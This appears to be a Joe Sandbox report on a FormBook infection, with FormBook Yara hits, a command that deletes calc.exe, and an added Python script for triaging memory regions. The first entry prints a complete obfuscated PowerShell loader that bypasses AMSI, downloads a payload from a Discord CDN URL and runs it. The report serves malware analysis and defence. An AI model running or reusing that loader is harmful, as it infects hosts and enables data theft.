                                        Start time:17:59:24
                                        Start date:22/07/2021
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
Commandline:Powershell $8B0111F552=[Ref].Assembly.GetType('Sy'+'stem.'+'Mana'+'gem'+'ent'+'.Autom'+'atio'+'n.A'+'m'+'si'+'Utils');$835FFE1926='4456625220575263174452554847';$9FE0AD5C66=[string](0..13|%{[char][int](53+($835FFE1926).substring(($_*2),2))})-replace ' ';$58FB808063=$8B0111F552.GetField($9FE0AD5C66,'Non^^^'.replace('^^^','Pub')+'lic,S'+'tatic');$58FB808063.SetValue($null,$true);($A72F9B815A=$A72F9B815A=Write-Host 'EC4AAB5808223EB722F9C2063ED056665AA80AC5658F9D06815720759C3EB4C4B7065724C3DEFA63DEB58FC3FA9D22121674');$676544567888888888876545666778=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,48,56,49,59,36,65,68,48,48,70,57,70,49,85,67,61,32,78,101,119,45,79,98,106,101,99,116,32,45,67,111,109,32,77,105,99,114,111,115,111,102,116,46,88,77,76,72,84,84,80,59,36,65,68,48,48,70,57,70,49,85,67,46,111,112,101,110,40,39,71,69,84,39,44,39,104,116,116,112,115,58,47,47,99,100,110,46,100,105,115,99,111,114,100,97,112,112,46,99,111,109,47,97,116,116,97,99,104,109,101,110,116,115,47,56,53,56,55,57,51,51,50,50,48,56,55,55,49,48,55,53,51,47,56,54,51,56,57,49,56,53,55,54,48,56,48,49,53,57,48,50,47,111,97,100,46,106,112,103,39,44,36,102,97,108,115,101,41,59,36,65,68,48,48,70,57,70,49,85,67,46,115,101,110,100,40,41,59,36,54,55,52,69,49,54,53,67,56,51,61,91,84,101,120,116,46,69,110,99,111,100,105,110,103,93,58,58,39,85,84,70,56,39,46,39,71,101,116,83,116,114,105,110,103,39,40,91,67,111,110,118,101,114,116,93,58,58,39,70,114,111,109,66,97,115,101,54,52,83,116,114,105,110,103,39,40,36,65,68,48,48,70,57,70,49,85,67,46,114,101,115,112,111,110,115,101,84,101,120,116,41,41,124,73,96,69,96,88);[System.Text.Encoding]::ASCII.GetString($676544567888888888876545666778)|I`E`X
                                        Imagebase:0x7ff617cb0000
                                        File size:447488 bytes
                                        MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:.Net C# or VB.NET
                                        Reputation:high

                                        General

                                        Start time:17:59:46
                                        Start date:22/07/2021
                                        Path:C:\Windows\SysWOW64\calc.exe
                                        Wow64 process (32bit):true
                                        Commandline:{path}
                                        Imagebase:0x9a0000
                                        File size:26112 bytes
                                        MD5 hash:0975EE4BD09E87C94861F69E4AA44B7A
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.342630046.0000000003140000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.341624374.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.342443102.0000000002F00000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:moderate

                                        General

                                        Start time:17:59:48
                                        Start date:22/07/2021
                                        Path:C:\Windows\explorer.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\Explorer.EXE
                                        Imagebase:0x7ff693d90000
                                        File size:3933184 bytes
                                        MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, Author: Joe Security
                                        • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                        • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.333088696.00000000070E4000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                        Reputation:high

General

Start time: 18:00:14
Start date: 22/07/2021
Path: C:\Windows\SysWOW64\help.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\help.exe
Imagebase: 0x1f0000
File size: 10240 bytes
MD5 hash: 09A715036F14D3632AD03B52D1DA6BFF
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches (each of the three rules below hit on each of the three memory dumps listed):
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Author: JPCERT/CC Incident Response Group
Sources:
• 00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp
• 00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp
• 00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp
Reputation: moderate
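
The memory-dump identifiers in the Yara sources above carry the information a triage analyst wants first: where in help.exe the FormBook signatures hit and with which page protection. The script below is an added example, not part of the Joe Sandbox report or of FormBook itself. It parses those three identifiers (copied from this page), decodes the protection field with the standard winnt.h constants (0x40 is PAGE_EXECUTE_READWRITE, 0x04 is PAGE_READWRITE), and checks each region against the help.exe image base reported above. Two assumptions are made and marked in the code: that the dump name is laid out as pid.dumptype.sequence.baseaddress.protection.memtype, and that the reported on-disk size of help.exe (10240 bytes) is a usable lower bound for the mapped image. Under those assumptions two of the three matching regions are RWX and lie outside the help.exe image, which is the memory footprint of injected code rather than of help.exe's own code, and the third is a plain RW region, where a configuration or string blob would normally sit.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple

# Base page-protection values from winnt.h. These occupy the low byte; modifier
# flags such as PAGE_GUARD (0x100) live above it and are masked off before lookup.
PROTECTION_NAMES = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = {0x10, 0x20, 0x40, 0x80}
WRITABLE = {0x04, 0x08, 0x40, 0x80}

# ASSUMPTION: the .sdmp name is laid out as
#   pid.dumptype.sequence.baseaddress.protection.memtype
# with every field hexadecimal. Only pid, base address and protection are used.
SDMP_RE = re.compile(
    r"^([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]+)\."
    r"([0-9A-Fa-f]{16})\.([0-9A-Fa-f]{8})\.([0-9A-Fa-f]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    name: str
    pid: int
    base: int
    protection: int


def parse_sdmp_name(name: str) -> DumpRegion:
    """Split a dump identifier into the fields needed for triage."""
    m = SDMP_RE.match(name)
    if not m:
        raise ValueError(f"not a recognised .sdmp name: {name}")
    pid, _dumptype, _seq, base, prot, _memtype = m.groups()
    return DumpRegion(name=name, pid=int(pid, 16), base=int(base, 16), protection=int(prot, 16))


def protection_name(prot: int) -> str:
    return PROTECTION_NAMES.get(prot & 0xFF, f"unknown(0x{prot:x})")


def classify(region: DumpRegion, image_base: int, image_span: int) -> str:
    """Label a region by whether it sits inside the process image and by its W/X bits.

    Writable-and-executable memory outside the main image is the classic footprint
    of injected or self-unpacked code; the image itself is expected to carry code.
    """
    base_prot = region.protection & 0xFF
    if image_base <= region.base < image_base + image_span:
        return "image"
    if base_prot in EXECUTABLE and base_prot in WRITABLE:
        return "rwx-outside-image"
    if base_prot in EXECUTABLE:
        return "exec-outside-image"
    return "data-outside-image"


def triage(names: List[str], image_base: int, image_span: int) -> List[Tuple[str, str, str]]:
    """Return (base address, protection name, verdict) for every dump identifier."""
    rows = []
    for name in names:
        region = parse_sdmp_name(name)
        rows.append((f"0x{region.base:X}", protection_name(region.protection),
                     classify(region, image_base, image_span)))
    return rows


# Constructed from the help.exe record on this page.
HELP_EXE_IMAGE_BASE = 0x1F0000
# ASSUMPTION: the on-disk size is taken as a lower bound for the mapped image.
# SizeOfImage from the PE header would be the exact value; regions that start just
# past the on-disk size could be misjudged, which does not affect these three.
HELP_EXE_IMAGE_SPAN = 10240
HELP_EXE_SOURCES = [
    "00000013.00000002.495738829.00000000026F0000.00000040.00000001.sdmp",
    "00000013.00000002.494603483.00000000001A0000.00000040.00000001.sdmp",
    "00000013.00000002.496106399.0000000002870000.00000004.00000001.sdmp",
]

if __name__ == "__main__":
    for base, prot, verdict in triage(HELP_EXE_SOURCES, HELP_EXE_IMAGE_BASE, HELP_EXE_IMAGE_SPAN):
        print(f"{base:>12}  {prot:<24}  {verdict}")
```

The same classification transfers to a live host: enumerate the target process with VirtualQueryEx (or a memory-forensics tool's VAD walk), and any private PAGE_EXECUTE_READWRITE region that is not backed by a mapped image deserves a dump and a Yara scan before anything else.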

General

Start time: 18:00:18
Start date: 22/07/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\WINDOWS\syswow64\calc.exe'
Imagebase: 0x150000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 18:00:19
Start date: 22/07/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7ecfc0000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
